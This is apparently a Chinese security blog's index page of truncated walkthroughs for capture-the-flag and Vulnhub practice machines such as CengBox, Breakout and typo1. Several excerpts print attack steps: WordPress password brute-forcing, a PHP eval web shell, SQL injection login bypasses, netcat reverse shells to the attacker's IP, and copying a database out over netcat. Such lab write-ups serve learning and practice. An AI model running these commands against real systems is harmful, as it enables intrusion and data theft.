晴川's Blog🌈

打靶-Miouche前言kali：192.168.0.106 靶机IP:192.168.0.109 难度：中等 这次打靶机前了解到一个新工具TSCAN，那这个靶场来测试一下新工具的使用 渗透过程首先，打开靶机就给了IP,我直接就用工具扫了 指纹显示是Wordperss 本来我还在找相应的漏洞，但是我万万没想到有相应的插件，kali还自带wpscan 1wpscan --url http://192.168.0.109 -e u,p 扫到用户名为Kitty 尝试爆破密码 1wpscan --url http://192.168.0.109 -U kitty -P ./rockyou.txt 字典太大了，扫了好久没扫出来 换一种方式，使用插件尝试 1wpscan --url http://192.168.0.109 -e u,p --plugins-detection mixed 扫到一个插件iwp-client 访问相关url http://192.168.0.109/wp-content/plugins/iwp-client/readme.txt 去msf查找相关漏洞 1 ...

c77546477099cff473e9bbacb8de14d221eb8a8ec540a1f2d0fe28c512bc227ddcc8c3a843e56f17d81d77ebd63676b0bf7188b57dacf394f29ce0f75bb15052bd382744eff411b8a548dc6c446ee6789e98f7e6172dd25d0a04f8c4fe99afb28d8651e4859f7dce71e3100786ac8fe89ebe82e9f4d5f8dacd88e7c832911f2a8bc21c53d2d8871698de25321e85de4a7ac7f47a82baa3fd8e5065dd7ed1d35694a4b81e991dc64da1a945d7a8f4f9bcae091cb2ffc7bc89e815f56c1d5e5c502d3408f67c08ceb8000d061b1883523e0e430fd81b828c00dcc21741c606220b2da602132e92fcf9ad1af8011ffe7b7aca5f81fe1c946d45c ...

春秋云镜-Initial信息搜集先扫描 22和80 渗透利用 连蚁剑， sudo -l 发现mysql具有root权限 flag01拿到flag1 查看内网ip 上fscan开扫 开的够多的 1234172.22.1.2 DC 172.22.1.21 MS17-010 172.22.1.18 信呼OA flag02接下来先打信呼OA，我们接下来上传frp到主机上，让内网的流量转发出来。 先打信乎OA 弱口令可以爆破，但是环境容易爆，谨慎 admin/admin123 进后台发现版本是V2.28 当前目录建一个1.php 1<?php eval($_POST["1"]);?> exp 12345678910111213141516171819202122232425262728293031import requestssession = requests.session()url_pre = 'http://172.22.1.18/'url1 = url_pre + '?a=check&am ...

打靶-CengBox前言kali IP:192.168.131.28 靶机IP:192.168.131.243 Difficulty : beginner/intermediate 渗透过程1arp-scan-l 1nmap -sV 192.168.131.243 -A 就22和80,看来这个靶机难度不是很高 先扫扫目录 1dirb http://192.168.131.243 /usr/share/wordlists/dirb/big.txt 扫到了masteradmin 继续扫一下masteradmin 1dirb http://192.168.131.243 -X .php 扫描到3个，db.php访问为空，访问upliads.php会跳转到login.php 页面存在sql注入,万能密码可登录 1admin'or 1=1# 登陆成功，进入文件上传，但没有反应 回去前面的sql注入 sqlmap抛出admin密码 1masteradmin/C3ng0v3R00T1! 出题人好阴险，登上admin上传文件还是没反应，我以为有问题 查看源码 ...

打靶-Cybox前言kali IP：192.168.0.112 靶机IP :192.168.0.113 Difficulty: Medium Objective: Get user.txt and root.txt 中途没理清代理怎么搞的 第二天来做ip换了 kali：192.168.131.28 靶机：192.168.131.132 渗透过程端口探测 看这样子入口点还是80web页面 扫扫目录 发现存在phpmyadmin但只允许127.0.0.1访问 assets下也都是些css或js文件 Contact: admin@cybox.company web页面最下脚发现有这个联系方式， 扫了半天没啥发现啊也，看这些端口不应该啊 实属没思路了，看看wp了 域名cybox.company，我们将其添加进hosts文件，尝试再次扫描一下 1vim /etc/hosts 后面用gobuster扫描，一款基于go语言的目录/文件和DNS爆破工具，可以对目录、文件、DNS和VHost等对象进行暴力破解攻击，下载链接https://github.com/OJ/gobuster，k ...

打靶-broken前言靶机IP: 192.168.131.111 kali IP: 192.168.131.28 难度：中等 beginner for user flag and intermediate for root flag. 渗透过程扫ip 扫端口 经典端口 直接上web页面看看 一个页面开始啥也没发现 dirsearch扫的 或者 1nikto -h 192.168.131.111 后面看到有cms页面提示flag1 对该路径继续扫描 扫到/cms/cc 发现会进行访问数据包 尝试nc监听发现，他会访问特定的文件 43793a49a637e7c76861f4aa46e6cdb9.sh sh文件，可以执行脚本文件，尝试在本地的这个文件中写入命令 1systemctl start nginx 先启动nginx， 1echo "nc 192.168.131.28 9999 -e /bin/bash">43793a49a637e7c76861f4aa46e6cdb9.sh 反弹到shell 一顿乱翻，发现在index. ...

打靶-My cmscms前言靶机ip:192.168.0.109 kali IP：192.168.0.106 Goal: Get the root flag of the target. 渗透过程TScan扫描一下 先看80，好熟悉的界面，以前NKCTF做过，先去看看以前的题，记得当时是个后台文件上传RCE 尝试密码无果，去测试一下mysql有没有弱密码 好家伙直接弱密码 1mysql -uroot -p -h 192.168.0.109 包意思，中途连sql不知道咋了虚拟机炸了，直接换了一个 fb67c6d24e756229aab021cea7605fb3 本来想直接MD5解密网站偷懒，没想到不行，只能换一种方法了，更改密码 网上应该会有用这个cms忘记密码改密码的过程 果然，直接改为123456 1update cms_users set password = (select md5(CONCAT(IFNULL((SELECT sitepref_value FROM cms_siteprefs WHERE sitepref_name = 'sitemask&# ...

打靶-Breakout前言靶机地址Vulnhub-EMPIRE: BREAKOUT kali 攻击机ip：192.168.31.215 靶机 ip：192.168.31.26 渗透过程此次靶机打开就给ip了，也不用去发现靶机ip了 直接看看端口吧 1nmap -sV 192.168.31.26 -A 可以看到这次开放的端口有 80 139 445 10000 20000 老规矩，先看看80 查看源代码发现这么一串 1234567<!--don't worry no one will get here, it's safe to share with you my access. Its encrypted :)++++++++++[>+>+++>+++++++>++++++++++<<<<-]>>++++++++++++++++.++++.>>+++++++++++++++++.----.<++++++++++.-----------.>-----------.++ ...

打靶-easy_cloudantivirus前言靶机难度：简单 靶机ip：192.168.31.52 kali ip：192.168.31.215 渗透记录1arp-scan -l 查看开放端口 1nmap -sV 192.168.31.52 -A 就开放了22 8080 先看看8080 一个输入框 经测试输入”会报错 猜测存在sql注入 尝试万能密码 1"or 1=1--+ 登陆成功 进入后，看这样子好像是执行了ls -al 拼接管道符可以执行命令 11|ls 尝试反弹shell，发现可以nc 但是加上-e命令收不到。。。 后面学到了一种新方法 nc两个 1|nc 192.168.31.215 999 |/bin/bash |nc 192.168.31.215 888 发现在999读端口执行命令。888端口有回显 通过查看app.py的内容 通过阅读代码不难发现，其链接了sqllite 读取database.sql文件 在终端在开启一个监听 nc -lvvp 8989 > db.sql 执行 nc 192.168.31.215 <dat ...

打靶-typo1前言环境地址：https://www.vulnhub.com/entry/typo-1,472/ kali IP：192.168.131.28 目的机ip :192.168.131.82 渗透过程老规矩 虽然靶机给了ip，流程还是要走走的 1arp-scan -l 123nmap -sV -A 192.168.131.82sudo nmap -sS -sV -sC -p- 192.168.131.82-oN nmap_full_scannmap -A -v -sV -T5 -p- --script=http-enum 192.168.131.82 访问80端口发现是typo3cms 但是pagenotfound dirsearch扫描发现了INSTALL.md文档， 通过查看其中的网址来看 安装更新路径在typo3/install.php 发现登录被锁 访问index.php 发现了登录界面，尝试了几个弱密码发现失败 尝试一下其他端口，8080一个hello发现没啥，8081是phpmyadmin/ root root直接登录成功 我 ...